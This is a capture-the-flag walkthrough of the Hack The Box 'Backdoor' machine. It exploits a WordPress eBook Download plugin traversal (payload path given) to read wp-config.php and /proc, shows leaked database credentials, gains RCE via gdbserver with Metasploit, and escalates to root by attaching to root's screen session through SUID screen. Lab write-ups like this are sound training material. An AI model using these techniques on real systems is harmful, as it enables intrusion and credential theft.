IP-ADDR: backdoor.htb
nmap scan:
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b4:de:43:38:46:57:db:4c:21:3b:69:f3:db:3c:62:88 (RSA)
| 256 aa:c9:fc:21:0f:3e:f4:ec:6b:35:70:26:22:53:ef:66 (ECDSA)
|_ 256 d2:8b:e4:ec:07:61:aa:ca:f8:ec:1c:f8:8c:c1:f6:e1 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.8.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Backdoor – Real-Life
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web server is running wordpress.
with wpscan, collected some information.
- : WordPress version 5.8.1 identified
- [i] User(s) Identified: admin
Manually go through wp common directories /wp-content
and /wp-includes
allowed indexing but nothing interesting there./wp-content
is not indexing but/wp-content/plugins
directory is allowed indexing
there is a plugin in plugins directory
❯ searchsploit wordpress ebook download
----------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------- ---------------------------------
WordPress Plugin eBook Download 1.1 - Directory Traversal | php/webapps/39575.txt
----------------------------------------------------------------------------------- ---------------------------------
And right off the bat found Directory Traversal vulnerability in WordPress Plugin eBook Download 1.1 from searchsploit.
its simply allowed file inclusion from /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
with lfi, get the wp-config.php
file and db creds: wordpressuser:MQYBJSaD#DxG6qbm
Don't get anything interesting
Moving on to port 1337 but not able to identify the service.
we have lfi that means we can read system file and use this ability and try to find the port 1337 service.
in linux everything is file even a running process and we can read every process from /proc
; Source: proc man page
: The proc filesystem is a pseudo-filesystem which provides an interface to kernel data structures.
: subdirectories Each one of these subdirectories contains files and subdirectories exposing information about the process with the corresponding process ID.
: This read-only file holds the complete command line for the process.
I use burp intruder to brute force pid to find the process.
For current boot, the PID for service that running on port 1337 in 862
/bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once /bin/true;"; done
Port 1337 is running gdbserver. We can connect to this service with gdb.
There is a very old (2013) technique on gdbserver to RCE from jbremer.org
To make this easy there is a metasploit module based on this exploit.
Running msf module and get shell on the box
Running find command for setuip binary on the box and found /usr/bin/screen
with setuip bit permission.
And screen version Screen version 4.08.00 (GNU) 05-Feb-20
There is a CVE-2017-5618 in GNU screen before 4.5.1 allows local users to modify arbitrary files and consequently gain root privileges by leveraging improper checking of log file permissions.
Found exploit: https://github.com/XiphosResearch/exploits/tree/master/screen2root
But looks like this version of screen is not vulnerable for this exploit.
Another thing we can check is screen sessions with screen -ls <username>/
(remote) user@Backdoor:/etc$ screen -ls user/
No Sockets found in /run/screen/S-user.
And because screen command have suid permission we can also view root user sessions.
(remote) user@Backdoor:/etc$ screen -ls root/
There is a suitable screen on:
53053.root (11/22/21 07:35:40) (Multi, detached)
1 Socket in /run/screen/S-root.
And there is one session active named root
. We can access it with screen -x <username>/<session-name>
screen -x root/root